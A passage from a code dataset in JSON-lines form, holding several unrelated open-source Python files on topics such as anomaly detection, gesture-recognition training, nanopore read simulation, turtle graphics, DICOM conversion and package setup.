n_training_samples)\nprint('Number of dimensions/features: %d' % n_dim)\n\n\nL = tr_data.iloc[:,0]\nT = tr_data.iloc[:,1]\n\nplt.xlabel('Latency (ms)')\nplt.ylabel('Throughput (mb/s)')\nplt.plot(L,T,'bx')\nplt.show()\n\nmu, sigma = estimateGaussian(tr_data)\np = multivariateGaussian(tr_data,mu,sigma)\n\n#selecting optimal value of epsilon using cross validation\np_cv = multivariateGaussian(cv_data,mu,sigma)\nfscore, ep = selectThresholdByCV(p_cv,gt_data)\nprint(fscore, ep)\n\n#selecting outlier datapoints \n\noutliers = np.asarray(np.where(p < ep))\n\nolist = outliers[0].tolist()\n\n\nplt.figure()\nplt.xlabel('Latency (ms)')\nplt.ylabel('Throughput (mb/s)')\nplt.plot(L,T,'bx')\n\nplt.plot(tr_data.iloc[olist,[0]], tr_data.iloc[olist,[1]],'ro')\nplt.show()\n\n\n","repo_name":"lizhi97/MachineLearning-scikit-learn","sub_path":"Anomaly-Detection/detection_Gaussian.py","file_name":"detection_Gaussian.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13709951517","text":"\"\"\"\nTraining model\n\nReference: https://github.com/piergiaj/pytorch-i3d\nEdited by Shen Jie Koh\n\"\"\"\n#此程式為論文原作者程式修改而來\n#可刪除RGB模式\n#可以run,但要改loss function算法和重新架構程式\n\nimport os\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" \nos.environ[\"CUDA_VISIBLE_DEVICES\"]='1'\nimport sys\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-mode', type=str, help='rgb or depth')\nparser.add_argument('-save_model', type=str)\nparser.add_argument('-root', type=str)\n\nargs = parser.parse_args()\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\nimport torchvision\n\nimport numpy as np\n\nfrom pytorch_i3d import InceptionI3d\n\nfrom dataset import FloorDataset as Dataset\n\ndef run(init_lr=0.1, max_steps=64e3, mode='depth', root='', csv_file='', batch_size=1, save_model='testing'):\n # setup dataset\n if mode == 'depth':\n root = '../data/train'\n csv_file = 'csv_file/depth.csv'\n else:\n root = '../data/train' #後續需刪除RGB mode\n csv_file = 'csv_file/rgb.csv'\n \n dataset = Dataset(csv_file, root)\n train_set_size = int(len(dataset)*0.8)\n val_set_size = len(dataset) - train_set_size\n train_dataset, val_dataset = torch.utils.data.random_split(dataset, [train_set_size, val_set_size])\n \n train_dataloader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\n val_dataloader = torch.utils.data.DataLoader(val_dataset, batch_size=batch_size, shuffle=True) \n\n dataloaders = {'train': train_dataloader, 'val': val_dataloader}\n datasets = {'train': train_dataset, 'val': val_dataset}\n\n # setup the model\n if mode == 'depth':\n i3d = InceptionI3d(14, in_channels=1)\n #i3d.load_state_dict(torch.load('models/flow_imagenet.pt'))\n else:\n i3d = InceptionI3d(14, in_channels=3)\n #i3d.load_state_dict(torch.load('models/rgb_imagenet.pt'))\n i3d.replace_logits(14)\n #i3d.load_state_dict(torch.load('/ssd/models/000920.pt'))\n i3d.cuda()\n i3d = nn.DataParallel(i3d)\n\n lr = init_lr\n optimizer = optim.SGD(i3d.parameters(), lr=lr, momentum=0.9, weight_decay=0.0000001)\n lr_sched = lr_scheduler.MultiStepLR(optimizer, [300, 1000])\n\n num_steps_per_update = 4 # accum gradient\n steps = 0\n # train it\n while steps < max_steps:#for epoch in range(num_epochs):\n print('Step {}/{}'.format(steps, max_steps))\n print('-' * 10)\n\n # Each epoch has a training and validation phase\n for phase in ['train', 'val']:\n if phase == 'train':\n i3d.train(True)\n else:\n i3d.train(False) # Set model to evaluate mode\n \n tot_loss = 0.0\n tot_loc_loss = 0.0\n tot_cls_loss = 0.0\n num_iter = 0\n optimizer.zero_grad()\n \n # Iterate over data.\n for data in dataloaders[phase]:\n num_iter += 1\n # get the inputs\n inputs, labels, path = data\n\n # wrap them in Variable\n inputs = Variable(inputs.cuda())\n #t = inputs.size(2)\n labels = Variable(labels.cuda())\n \n per_frame_logits = i3d(inputs)\n \n \n # upsample to input size\n #per_frame_logits = F.upsample(per_frame_logits, t, mode='linear')\n #print(per_frame_logits.size())\n #print(labels.size())\n\n # compute localization loss\n loc_loss = nn.CrossEntropyLoss(per_frame_logits, labels)\n #tot_loc_loss += loc_loss.data[0]\n tot_loc_loss += loc_loss.item()\n\n # compute classification loss (with max-pooling along time B x C x T)\n cls_loss = nn.CrossEntropyLoss(torch.max(per_frame_logits, dim=2)[0], torch.max(labels, dim=2)[0])\n #tot_cls_loss += cls_loss.data[0]\n tot_cls_loss += cls_loss.item()\n\n loss = (0.5*loc_loss + 0.5*cls_loss)/num_steps_per_update\n #tot_loss += loss.data[0]\n tot_loss += loss.item()\n loss.backward()\n\n if num_iter == num_steps_per_update and phase == 'train':\n steps += 1\n num_iter = 0\n optimizer.step()\n optimizer.zero_grad()\n lr_sched.step()\n if steps % 10 == 0:\n print('{} Loc Loss: {:.4f} Cls Loss: {:.4f} Tot Loss: {:.4f}'.format(phase, tot_loc_loss/(10*num_steps_per_update), tot_cls_loss/(10*num_steps_per_update), tot_loss/10))\n # save model\n #torch.save(i3d.module.state_dict(), save_model+str(steps).zfill(6)+'.pt')\n tot_loss = tot_loc_loss = tot_cls_loss = 0.\n if phase == 'val':\n print('{} Loc Loss: {:.4f} Cls Loss: {:.4f} Tot Loss: {:.4f}'.format(phase, tot_loc_loss/num_iter, tot_cls_loss/num_iter, (tot_loss*num_steps_per_update)/num_iter))\n \n\n\nif __name__ == '__main__':\n # need to add argparse\n run(mode=args.mode, root=args.root, save_model=args.save_model)\n","repo_name":"shenjiekoh/gesture-recognition-l515","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20352863559","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom astropy.io import fits\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef fit_inactive_sequence():\n\n deg = 3\n target_url = ('https://zenodo.org/record/2636692/files/'\n 'MLSDSS-GaiaDR2_extended.fits?download=1')\n mlsdss = fits.open(target_url)\n \n r_ext = mlsdss[1].data['EXTINCTION'][:,2]\n z_ext = mlsdss[1].data['EXTINCTION'][:,4]\n ext = r_ext-z_ext\n mask_ext = ext < 0.1\n subred = (mlsdss[1].data['photometric_sample_subred'] == 1) * mask_ext \n \n ewha = mlsdss[1].data['EWHA'][subred]\n color = (mlsdss[1].data['phot_g_mean_mag'][subred] \n - mlsdss[1].data['phot_rp_mean_mag'][subred])\n \n mask_nan = ~np.isnan(color+ewha)* (ewha < 1)\n color1,ewha1 = color[mask_nan],ewha[mask_nan]\n \n p = np.polyfit(color1,ewha1,deg)\n #mask = abs(np.polyval(p,color1)-ewha1) < 0.2\n #for i in range(2):\n # p = np.polyfit(color1[mask],ewha1[mask],deg)\n # mask = abs(np.polyval(p,color1)-ewha1) < 0.2 \n \n x = np.linspace(0.8,1.5,10)\n \n plt.plot(color,ewha,'.')\n plt.plot(x,np.polyval(p,x),'-k')\n plt.ylim(-3,4)\n plt.xlim(0.8,1.5)\n plt.show()\n \n print(p)\n \nfit_inactive_sequence()","repo_name":"rkiman/M-dwarfs-Age-Activity-Relation","sub_path":"src/fit_inactive_seq.py","file_name":"fit_inactive_seq.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36292945280","text":"#!C:\\Anaconda3\\python.exe\n\nimport numpy as np\nimport pandas as pd\nimport os\n\n\ncp = pd.read_clipboard(sep='\\t')\nprint(cp)\n\ncp.to_json('df.json', orient='records', lines=True)\nos.remove(\"./df.json\")\n\n# Data\ntextMatrix = [(\"Earth\", \"Sphere\", \"Geoid\"), (\"Matter\", \"Particle\", \"Wave\"), (\"Magnet\", \"Flex\", \"Electricity\")];\n\n# Create a DataFrame\ndf = pd.DataFrame(data=textMatrix);\n\n# Copy DataFrame contents to clipboard\ndf.to_clipboard(sep=\"\\t\");\n","repo_name":"xiaolongjia/techTrees","sub_path":"Python/02_DataEngineering/Pandas/04_read_clipboard.py","file_name":"04_read_clipboard.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25878403152","text":"'''\nModify the turtle walk program so that you have two turtles each with\na random starting location. Keep the turtles moving until one of them\nleaves the screen.\n'''\n\nimport random\nimport turtle\n\n# Initializing boht turtles\nt1 = turtle.Turtle()\nt2 = turtle.Turtle()\nwindow = turtle.Screen()\n\n# Initializing shape of turtles\nt1.shape('square')\nt2.shape('circle')\n\n# Boundaries of window.\nleftBound = -window.window_width() / 2\nrightBound= window.window_width() / 2\ntopBound = window.window_height() / 2\nbottomBound = -window.window_height() / 2\n\n\n# Random movement of turtle\ndef moveRandom(window, t):\n coin = random.randrange(0,2)\n if coin == 0:\n t.left(90)\n else:\n t.right(90)\n\n t.forward(50)\n\n\n# Collision Detection\ndef collision_detection(t1, t2):\n if t1.distance(t2) < 2:\n return True\n else:\n return False\n\n\n# Check to see if both turtles are on the screen/window\ndef check_on_screen(w, t):\n # Boundaries of window.\n leftBound = -window.window_width() / 2\n rightBound= window.window_width() / 2\n topBound = window.window_height() / 2\n bottomBound = -window.window_height() / 2 \n\n turtleX = t.xcor()\n turtleY = t.ycor()\n\n stillIn = True\n if turtleX < leftBound or turtleX > rightBound:\n stillIn = False\n if turtleY < bottomBound or turtleY > topBound:\n stillIn = False\n return stillIn\n\n\n# t1 random movements\nt1.up()\n# random.uniform vs random.randrange\n# https://stackoverflow.com/questions/26784252/non-integer-arg-1-for-randrange-in-python-libary\nt1.goto(random.uniform(leftBound, rightBound),\n random.uniform(bottomBound, topBound))\nt1.setheading(random.randrange(0, 360))\nt1.down()\n\n#t2 random movements\n# random.uniform vs random.randrange\n# https://stackoverflow.com/questions/26784252/non-integer-arg-1-for-randrange-in-python-libary\nt2.up()\nt2.goto(random.uniform(leftBound, rightBound),\n random.uniform(bottomBound, topBound))\nt2.setheading(random.randrange(0, 360))\nt2.down()\n\n\nwhile check_on_screen(window, t1) and check_on_screen(window, t2):\n moveRandom(window, t1)\n moveRandom(window, t2)\n\n\nwindow.exitonclick()\n","repo_name":"KenjaminButton/runestone_thinkcspy","sub_path":"8_more_about_iteration/exercises/8.14.5.py","file_name":"8.14.5.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27862149116","text":"\"\"\"\n The main function of this script is to simulate negative samples or normal samples\nfor multi-sample nanopore sequencing data. \n The simulation scheme of negative samples is mainly: \n 1) The adapter sequence and the barcode sequence are missing. \n 2) The absence of the barcode sequence. \n 3) Incomplete barcode sequence (More than 40 percent missing).\n The normal sequence: <-----------><-------------><--------------><-------------><----------->\n topAdapter topBarcode read endBarcode endAdapter\n\"\"\"\nimport random\nimport sys\nimport argparse\nimport os\nif 'script' not in sys.path:\n sys.path.append('script')\nfrom ex_info_from_read import getSeqsFromFasta as GSFF\nfrom ex_info_from_read import writeSeqs2Fasta as S2F\nfrom ex_info_from_read import get_seq_list, get_id_list\nif 'module/simulateNanoSigs' not in sys.path:\n sys.path.append('module/simulateNanoSigs')\nif 'module/simulateNanoSigs/module/' not in sys.path:\n sys.path.append('module/simulateNanoSigs')\nfrom generatNoiseSignal import sequence_to_true_signal\nfrom multiprocessing import Pool\n\nimport Bio.SeqIO\nfrom badread.simulate import sequence_fragment, ErrorModel, QScoreModel, Identities\nMISBASELINE = 0.6\n\n# ERRORMODELIST = [1, 2, 3] # If there is a normal sequence, change to [0, 0,...,0, 1, 2, 3], \n # the number of '0' controls the probability of normal sequence occurrence.\n# ERRORMODELIST = [0] # If we only want the data that was successfully barcoded, ERRORMODELIST is equal to [0].\n\ndef reverse_complement(dna_sequence):\n complement_dict = {'A': 'T', 'T': 'A', 'C': 'G', 'G': 'C'}\n reverse_complement_seq = ''.join([complement_dict[base] for base in reversed(dna_sequence)])\n return reverse_complement_seq\n\ndef sim_read(perfect_read, error_model = 'nanopore2023', qscore_model = 'nanopore2023', identities = '95,5,99'):\n \"\"\"Simulate error into perfect read using Badread error and qscore model\n\n read (str): perfect reads\n \"\"\"\n output=sys.stderr\n mean, sd, maxi = [float(x) for x in identities.split(',')]\n identities = Identities(mean, sd, maxi, output)\n\n error_model = ErrorModel(error_model, output)\n qscore_model = QScoreModel(qscore_model, output)\n\n seq, quals, actual_identity, identity_by_qscores = \\\n sequence_fragment(perfect_read, identities.get_identity(), \n error_model, qscore_model)\n return seq\n\ndef generateRefNegseq(topAdapter = \"\", \\\n topBarcode = \"\", \\\n read = \"\", \\\n endAdapter = \"\", \\\n endBarcode = \"\", \\\n errorMode = 1, \\\n libaryMode = 'ONTMUTISAMPLE'):\n \"\"\"\n When the libaryMode == 'ONTMUTISAMPLE':\n The correct sequence: <-----------><-------------><--------------><-------------><----------->\n topAdapter topBarcode read endBarcode endAdapter\n The main characteristic of the failed sequence (negative sample sequence) is the absence of barcode.\n \"\"\"\n\n if libaryMode == 'ONTMUTISAMPLE': # No error.\n if errorMode == 0:\n refRead = topAdapter + topBarcode + read + endBarcode + endAdapter\n return refRead\n elif errorMode == 1: # The adapter sequence and the barcode sequence are missing.\n return read\n elif errorMode == 2: # The absence of the barcode sequence. \n refRead = topAdapter + read + endAdapter\n return refRead\n else: # Incomplete barcode sequence.\n topRate = random.uniform(MISBASELINE, 1)\n incompTopBarcode = topBarcode[0:int(len(topBarcode)*(1-topRate))]\n\n endRate = random.uniform(MISBASELINE, 1)\n incompEndBarcode = endBarcode[0:int(len(endBarcode)*(1-endRate))]\n\n refRead = topAdapter + incompTopBarcode + read + incompEndBarcode + endAdapter\n return refRead\n else:\n pass\n\ndef getRefNegSeqs(inReadFile, inBarFile, inAdapterFile, outFile, ERRORMODELIST = [1, 2, 3], trueBarFile = 'trueBars.csv'):\n '''generate the negtive sequences.'''\n inReads = GSFF(inReadFile)\n inBars = GSFF(inBarFile)\n inAdapters = GSFF(inAdapterFile)\n outRefReads = []\n file = open(trueBarFile, 'w')\n file.write('top barcode,end barcode\\n')\n for read in inReads:\n errorMode = random.choice(ERRORMODELIST)\n barcode = random.choice(inBars)\n reverBarcode = reverse_complement(barcode)\n refRead = generateRefNegseq(topAdapter = inAdapters[0], \\\n topBarcode = barcode, \\\n read = read, \\\n endBarcode = reverBarcode, \\\n endAdapter = inAdapters[1], \\\n errorMode = errorMode)\n outRefReads.append(refRead)\n file.write('%s,%s\\n'%(barcode, reverBarcode))\n S2F(outRefReads, outFile)\n file.close()\n\ndef getSigBySeq(seq, index, output_folder, sigroot):\n sequence_to_true_signal((seq, index), output_folder = output_folder, sigroot = sigroot)\n\ndef getRefNegSigs(inRefNegFile, outSigsDir, sigRootName = 'timeSeries'):\n seq_list = get_seq_list(inRefNegFile)\n id_list = get_id_list(inRefNegFile)\n # zip_id_seq = list(zip(seq_list, id_list))\n outList = [outSigsDir for i in range(len(id_list))]\n rootList = [sigRootName for i in range(len(seq_list))]\n args = list(zip(seq_list, id_list, outList, rootList))\n isExists_out = os.path.exists(outSigsDir)\n if not isExists_out:\n os.makedirs(outSigsDir)\n\n pool = Pool(8)\n list(pool.starmap(getSigBySeq, args))\n pool.close()\n pool.join()\n # for seq in zip_id_seq:\n # sequence_to_true_signal(seq, output_folder = outSigsDir, sigroot = sigRootName)\n\ndef getSimNegs(inRefNegFile, outSimNegFile):\n cmd = 'bash fast_sim_reads.sh %s %s'%(inRefNegFile, outSimNegFile)\n os.system(cmd)\n\ndef mainFunction(inReadFile, inBarFile, inAdapterFile, outRefFile, outSimRefFile, outSigsDir, sigRootName = 'timeSeries', \n ERRORMODELIST = [1, 2, 3], trueBarFile = 'trueBars.csv'):\n getRefNegSeqs(inReadFile = inReadFile, inBarFile = inBarFile, inAdapterFile = inAdapterFile, \n outFile = outRefFile, ERRORMODELIST = ERRORMODELIST, trueBarFile = trueBarFile)\n\n getSimNegs(inRefNegFile = outRefFile, outSimNegFile = outSimRefFile)\n\n getRefNegSigs(inRefNegFile = outRefFile, outSigsDir = outSigsDir, sigRootName = sigRootName)\n\ndef get_parameters():\n \"\"\"This script generates noiseless nanopore signals based on DNA sequences\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--read-file', type=str, required=True,\n help='It is the fasta file that contains reads.')\n\n parser.add_argument('--barcode-file', type=str, required=True,\n help='It is the fasta file that contains the barcode sequences.')\n\n parser.add_argument('--adapter-file', type=str, required=True,\n help='It is the fasta file that contains the adapter sequences.')\n\n parser.add_argument('--ref-negtive-file', type=str, required=True,\n help='It is the fasta file containing the final reference negative sequences.')\n\n parser.add_argument('--sim-negtive-file', type=str, required=True,\n help='It is the fasta file containing the final simulated negative sequences.')\n\n parser.add_argument('--sim-sig-floder', type=str, required=True,\n help='It is the folder path containing the nanopore signals simulated based on the 6-mer model.')\n \n parser.add_argument('--sim-mode', type=int, required=False, default = 0,\n help='It is the mode of simulating data. If it is set to 0, it will only \\\n simulate the negative sequence, otherwise it will simulate the sequence that is successfully inserted into the barcode.')\n \n parser.add_argument('--true-bar-file', type=str, required=False, default = \"trueBars.csv\",\n help='It is a file implying the real barcode carried by the simulated sequence (top barcode, end barcode)') \n \n parser.add_argument('--sig-root', type=str, required=False, default = \"timeSeries\",\n help='It is the prefix to the filename of the nanopore signal being simulated.')\n\n args = parser.parse_args()\n\n return args\n\ndef main():\n\n args = get_parameters()\n if args.sim_mode == 0:\n BAR_ADA_ALLLOSE_LIST = [1 for i in range(60)]\n BAR_LOSE_LIST = [2 for i in range(20)]\n BAR_ABSENCE_LIST = [3 for i in range(20)]\n ERRORMODELIST = BAR_ADA_ALLLOSE_LIST + BAR_LOSE_LIST + BAR_ABSENCE_LIST\n random.shuffle(ERRORMODELIST)\n else:\n ERRORMODELIST = [0]\n\n mainFunction(inReadFile = args.read_file, \\\n inBarFile = args.barcode_file, \\\n inAdapterFile = args.adapter_file, \\\n outRefFile = args.ref_negtive_file, \\\n outSimRefFile = args.sim_negtive_file, \\\n outSigsDir = args.sim_sig_floder, \\\n ERRORMODELIST = ERRORMODELIST, \\\n trueBarFile = args.true_bar_file, \\\n sigRootName = args.sig_root)\n\nif __name__ == \"__main__\":\n main()\n\n \n","repo_name":"junhaiqi/MSNANOSIM","sub_path":"mutiSampleONTSimulator.py","file_name":"mutiSampleONTSimulator.py","file_ext":"py","file_size_in_byte":9398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17968713781","text":"'''\r\nCreated on Nov 23, 2016\r\n\r\n@author: felix\r\n'''\r\nfrom simu_funcs import *\r\nfrom simulation import *\r\nfrom plot_funcs import *\r\n \r\ndef main():\r\n while True:\r\n try:\r\n shares_input_str = ''\r\n trials_input_str = ''\r\n \r\n while not valid_share_str(shares_input_str):\r\n shares_input_str = input(\"Please enter a list of 4 integers separated by commas as number of shares to buy in parallel\\n\")\r\n shares_input_str = rm_ws(shares_input_str)\r\n\r\n while not valid_trial_str(trials_input_str):\r\n trials_input_str = input(\"Please enter the number of simulation trials\\n\")\r\n trials_input_str = rm_ws(trials_input_str)\r\n\r\n positions = [int(string) for string in shares_input_str.split(\",\")]\r\n num_trials = int(trials_input_str)\r\n this_simu = simulation(positions,num_trials)\r\n \r\n this_simu.simulate() # Run the simulation\r\n \r\n cumu_ret = this_simu.simulate_results # Collect the simulated results\r\n\r\n \r\n daily_ret = (cumu_ret/1000) - 1\r\n\r\n result_file = open('results.txt', 'w')\r\n for ii in np.arange(len(positions)):\r\n this_plot_data = daily_ret[:,ii]\r\n this_position_int = positions[ii]\r\n \r\n plot_simulation(this_plot_data, this_position_int) \r\n \r\n this_mean = np.mean(this_plot_data)\r\n this_std = np.std(this_plot_data)\r\n \r\n write_simulation(result_file, this_position_int, this_mean, this_std)\r\n\r\n result_file.close()\r\n print('results.txt saved.')\r\n\r\n break\r\n \r\n except KeyboardInterrupt:\r\n exit('Program terminated')\r\n except:\r\n pass\r\n \r\n exit('Program finished.')\r\nif __name__ == '__main__':\r\n try:\r\n main()\r\n except EOFError:\r\n pass","repo_name":"ds-ga-1007/assignment8","sub_path":"zl1271/assignment8.py","file_name":"assignment8.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12337091183","text":"''' 풀이 과정\n# 분석 \n입출력 예를 보고 다음을 생각했다.\n prices[0] = 1 -> 나머지 4개의 값보다 작다.\n prices[1] = 2 -> [1]을 제외한 나머지 3개의 값보다 작다.\n prices[2] = 3 -> [1, 2]를 제외한 나머지 중 2보다는 크고 3과는 같다.\n prices[3] = 2 -> [1, 2, 3]을 제외한 나머지 1개의 값보다 작다.\n prices[4] = 3 -> [1, 2, 3, 2]를 제외하고 비교할 나머지 값이 없다.\n\n즉, 이전의 데이터를 제외하고 뒤에 있는 데이터들과 비교했을 때 같거나 작은 수만큼 +1을 하면 [4, 3, 1, 1, 0]을 구할 수 있다.\n'''\n\ndef solution(prices):\n answer = [0] * len(prices)\n \n for i in range(len(prices)-1):\n for j in range(i+1, len(prices)):\n if prices[i] <= prices[j]:\n answer[i] += 1\n return answer\n\n","repo_name":"Yejin-Ha/Coding-Test","sub_path":"Programmers/Level2/주식가격.py","file_name":"주식가격.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"33653705749","text":"from tool.get_session import GetSession\n\n\nclass ApiNoticePublished:\n def api_notice_published_get(self, url, page_size, page_num, keywords=None):\n session = GetSession().get_session()\n params = {'action': 'listbypage',\n 'pagesize': page_size,\n 'pagenum': page_num,\n 'keywords': keywords,\n 'withoutcontent': 'true'}\n return session.get(url, params=params)\n","repo_name":"bian-py/CIMP_API_test","sub_path":"api/api_notice_published.py","file_name":"api_notice_published.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32349924503","text":"import cv2 as cv\nimport numpy as np\n\ncap = cv.VideoCapture('sal.mp4')\nfourcc = cv.VideoWriter_fourcc(*'XVID')\nout = cv.VideoWriter('./output.avi', fourcc, 22.0, (1440, 1440))\n'''\nfor i in range(10):\n _, frame = cap.read()\n cv.imshow('frame',frame)\n cv.waitKey(1000)\n\ncv.destroyAllWindows()\n\n'''\ni = 0\nwhile(i < 700):\n\n _, frame = cap.read()\n if(_ == False):\n break\n \n r, g, b = cv.split(frame)\n\n r = r * 2\n g = g * 5 \n b = b * 10 \n\n frame = cv.merge((r,g,b))\n \n out.write(frame)\n i += 1\n\ncap.release()\nout.release()\ncv.destroyAllWindows()\nprint(i)","repo_name":"IlyaMbot/Video_with_py","sub_path":"edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"19766992293","text":"import os\nimport SimpleITK\nimport pydicom\nimport numpy as np\nimport cv2\nfrom tqdm import tqdm\nfrom PIL import Image\nimport csv\n\n\nfilename = 'stage_2_detailed_class_info.csv'\nimage_file = '/home/jinan/Datasets/Medical-datasets/chest-rsna/stage_2_train_images/'\nwith open(filename) as f:\n reader = csv.reader(f)\n header_row = next(reader)\n count =0\n for i in reader:\n image_id = i[0]\n img_name = image_file + image_id +'.dcm'\n print(img_name)\n ds = pydicom.read_file(img_name)\n img = Image.fromarray(ds.pixel_array)\n if i [1] =='Lung Opacity':\n save_file = './abnormal'+'/Lung_Opacity_'+i[0]+'.png'\n\n elif i[1] == 'Normal':\n save_file = './normal'+'/'+i[1]+'-'+i[0]+'.png'\n\n elif i[1] == 'No Lung Opacity / Not Normal':\n save_file = './abnormal'+'/'+'No-Not-Normal_'+i[0]+'.png'\n\n img.save(save_file)\n\n\n","repo_name":"DorisBao/BMAD","sub_path":"data_processing/chest/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"} +{"seq_id":"21884947563","text":"\"\"\"\nDIA packaged for use without COM registration using comtypes.\n\"\"\"\n\nimport sys\nimport pathlib\nimport ctypes\nimport comtypes\nfrom comtypes import client\nfrom . import _dia, cvconst\n\n\n__version__ = \"0.2.0\"\n\n\n_SCRIPT_DIR = pathlib.Path(__file__).resolve().parent\n\nif sys.maxsize > 2**32 - 1:\n _arch = \"amd64\"\nelse:\n _arch = \"x86\"\n\n_DIA_DLL = _SCRIPT_DIR / 'lib' / _arch / \"msdia140.dll\"\n\n\n#: The dia typelib module. Retrieved via :func:`comtypes.client.GetModule`.\n#:\n#: :meta hide-value:\ndia = client.GetModule(str(_DIA_DLL))\n\n\n_NoRegCoCreate = ctypes.WINFUNCTYPE(\n ctypes.HRESULT,\n ctypes.c_wchar_p,\n ctypes.POINTER(comtypes.GUID),\n ctypes.POINTER(comtypes.GUID),\n ctypes.POINTER(ctypes.c_void_p),\n\n)(_dia.NoRegCoCreatePtr)\n\n\ndef CreateObject(progid, interface=None):\n \"\"\"\n Create a DIA object from *progid* with the given *interface*.\n\n Since this is intended to be used without registering DIA, you should grab the progid as a class\n object from the :data:`dia` module variable.\n \"\"\"\n if interface is None:\n interface = comtypes.IUnknown\n\n clsid = comtypes.GUID.from_progid(progid)\n p = ctypes.POINTER(interface)()\n iid = interface._iid_\n _NoRegCoCreate(str(_DIA_DLL), ctypes.byref(clsid), ctypes.byref(iid), ctypes.byref(p))\n return client.GetBestInterface(p)\n","repo_name":"segevfiner/pydia2","sub_path":"pydia2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"8730753416","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\n\nwith open('README.rst') as readme_file:\n readme = readme_file.read()\n\nwith open('HISTORY.rst') as history_file:\n history = history_file.read().replace('.. :changelog:', '')\n\nrequirements = [\n 'jellyfish',\n 'backport_collections',\n 'numpy',\n 'pylev',\n]\n\ntest_requirements = [\n 'fake-factory',\n 'unittest2',\n 'sphinx',\n 'sphinx_rtd_theme',\n]\n\nsetup(\n name='EHRcorral',\n version='0.0.3',\n description=\"EHRcorral cross-matches and links electronic medical records for the purpose of de-duplication\",\n long_description=readme + '\\n\\n' + history,\n author=\"Nikhil Haas\",\n author_email='nikhil@nikhilhaas.com',\n url='https://github.com/nsh87/ehrcorral',\n packages=[\n 'ehrcorral',\n ],\n package_dir={'ehrcorral': 'ehrcorral'},\n include_package_data=True,\n package_data={'ehrcorral': ['*.json']},\n install_requires=requirements,\n license=\"ISCL\",\n zip_safe=False,\n keywords='record linkage ehr patient matching',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: ISC License (ISCL)',\n 'Natural Language :: English',\n \"Programming Language :: Python :: 2\",\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n ],\n test_suite='tests',\n tests_require=test_requirements,\n use_2to3=True\n)\n","repo_name":"nsh87/ehrcorral","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"2956359066","text":"import pytest\nfrom src.main import *\n\nclass TestRelationSelect:\n @pytest.fixture(autouse=True)\n def setup(self):\n # Initialize Relation with SECTION.csv for testing\n self.relation = Relation(\"data/SECTION.csv\")\n\n def test_select_valid_query(self):\n query = {\"YearOffered\": 2018}\n selected_data = self.relation.select(query)\n for col, data in selected_data.items():\n for value in data:\n assert value == 2018 if col == \"YearOffered\" else True\n\n def test_select_valid_query_multiple_conditions(self):\n query = {\"YearOffered\": 2017, \"Prof\": \"newton\"}\n selected_data = self.relation.select(query)\n for col, data in selected_data.items():\n for value in data:\n assert (value == 2017 if col == \"YearOffered\" else (value == \"newton\" if col == \"Prof\" else True))\n\n def test_select_no_match(self):\n query = {\"YearOffered\": 1999} # Year not in data\n selected_data = self.relation.select(query)\n assert all(len(data) == 0 for data in selected_data.values())\n\n\nif __name__ == '__main__':\n pytest.main()\n","repo_name":"mirola01/cs440","sub_path":"src/main/python/final/cs440-final-project-main/tests/select_test.py","file_name":"select_test.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19560510494","text":"from __future__ import annotations\n\nimport unittest\n\nfrom lsst.daf.relation import ColumnExpression, Materialization, iteration, tests\n\n\nclass MaterializationTestCase(tests.RelationTestCase):\n \"\"\"Tests for the Materialization operation and relations based on it.\"\"\"\n\n def setUp(self) -> None:\n self.a = tests.ColumnTag(\"a\")\n self.engine = iteration.Engine(name=\"preferred\")\n self.leaf = self.engine.make_leaf(\n {self.a}, payload=iteration.RowSequence([{self.a: 0}, {self.a: 1}]), name=\"leaf\"\n )\n # Materializing a leaf just returns the leaf, so we add a Selection to\n # make applying it 